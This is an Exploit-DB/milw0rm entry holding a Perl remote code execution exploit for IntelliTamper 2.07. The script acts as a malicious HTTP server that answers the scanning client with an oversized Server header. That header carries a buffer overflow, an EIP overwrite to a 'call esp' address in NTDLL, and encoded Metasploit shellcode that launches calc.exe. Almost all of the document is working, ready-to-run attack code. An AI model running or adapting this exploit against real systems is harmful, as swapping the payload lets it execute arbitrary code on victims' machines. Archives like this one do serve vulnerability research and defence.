IntelliTamper 2.07 - server header Remote Code Execution

EDB-ID:

6118


Author:

Koshi

Type:

remote


Platform:

Windows

Date:

2008-07-22


#!/usr/bin/perl
#
# IntelliTamper 2.07 Remote Code Execution ( server header )
#
# By: Koshi
#
# Guido Landi finally did it, thought i'd throw one in there.
# This example assumes you're scanning "http://127.0.0.1"
# For example, exploit may not work if you were to scan "http://127.0.0.1:80"
# or even changing it as slightly as "http://127.0.0.1/"
#
# gr33tz: Rima my baby, str0ke, messiah, Idol, old venny  ;) , BU,
# and finally, Guido Landi for sparking my interest in exploiting
# this application.
#
#

use IO::Socket;

my $msg="";
my $overflow = "A"x1536;
my $fun = "".
	"\xb3\x8d\x95\x7c". 						# EIP (0x7C958DB3      call esp NTDLL.DLL)
	"z3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0C".	# More buffer.
	"AAAA2Cb3Cb4CBBBB"; 						# Starts executing here


# win32_exec -  EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $sh3llcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63".
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x73\x41\x32\x41\x41\x32".
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x4b\x59\x59\x6c\x6a".
"\x48\x70\x44\x35\x50\x65\x50\x73\x30\x6e\x6b\x33\x75\x75\x6c\x4c".
"\x4b\x71\x6c\x53\x35\x74\x38\x55\x51\x78\x6f\x6e\x6b\x62\x6f\x36".
"\x78\x6c\x4b\x53\x6f\x65\x70\x36\x61\x6a\x4b\x43\x79\x6e\x6b\x76".
"\x54\x4e\x6b\x53\x31\x68\x6e\x64\x71\x6f\x30\x5a\x39\x4e\x4c\x6e".
"\x64\x6f\x30\x71\x64\x75\x57\x78\x41\x38\x4a\x74\x4d\x76\x61\x4f".
"\x32\x5a\x4b\x39\x64\x75\x6b\x43\x64\x67\x54\x74\x44\x74\x35\x48".
"\x65\x6c\x4b\x73\x6f\x37\x54\x57\x71\x38\x6b\x70\x66\x6e\x6b\x64".
"\x4c\x70\x4b\x4e\x6b\x33\x6f\x35\x4c\x64\x41\x38\x6b\x4c\x4b\x37".
"\x6c\x4c\x4b\x76\x61\x58\x6b\x6c\x49\x43\x6c\x55\x74\x56\x64\x4f".
"\x33\x44\x71\x4f\x30\x30\x64\x6c\x4b\x77\x30\x74\x70\x6f\x75\x49".
"\x50\x50\x78\x36\x6c\x4c\x4b\x33\x70\x54\x4c\x6e\x6b\x30\x70\x45".
"\x4c\x6e\x4d\x4c\x4b\x55\x38\x43\x38\x78\x6b\x44\x49\x6e\x6b\x4b".
"\x30\x6c\x70\x45\x50\x65\x50\x75\x50\x4c\x4b\x41\x78\x75\x6c\x51".
"\x4f\x30\x31\x7a\x56\x51\x70\x30\x56\x4f\x79\x38\x78\x6c\x43\x6b".
"\x70\x71\x6b\x72\x70\x61\x78\x4a\x50\x4d\x5a\x43\x34\x43\x6f\x43".
"\x58\x4c\x58\x49\x6e\x6c\x4a\x66\x6e\x43\x67\x69\x6f\x48\x67\x43".
"\x53\x73\x51\x50\x6c\x41\x73\x66\x4e\x70\x65\x72\x58\x71\x75\x37".
"\x70\x63";

my $overflow2 = "A"x1046;
my $buff = "$overflow$fun$sh3llcode";
my $resp = "".
	"HTTP/1.1 200 OK\r\n".
	"Connection: close\r\n".
	"Content-Length: 8\r\n".
	"Date: Mon, 21 Jul 2008 20:47:05 GMT\r\n".
	"Content-Type: text/plain\r\n".
	"Server: $buff\r\n".
	"MIME-Version: 1.0\r\n\r\n".
	"Exploit!\r\n";

my $sock = new IO::Socket::INET (LocalPort => '80', Proto => 'tcp', Listen => 1, Reuse => 1, );


print "Listening on port 80 for connections...\n";
my $new_sock = $sock->accept();
print "Got connection from client...\n";
my $sock_addr = recv($new_sock,$msg,190,0);
print "Sending client packet...\n";
print $new_sock "$resp";
print "Packet sent to client, voila?\n";
close($sock);
print "Socket closed\n";

# milw0rm.com [2008-07-22]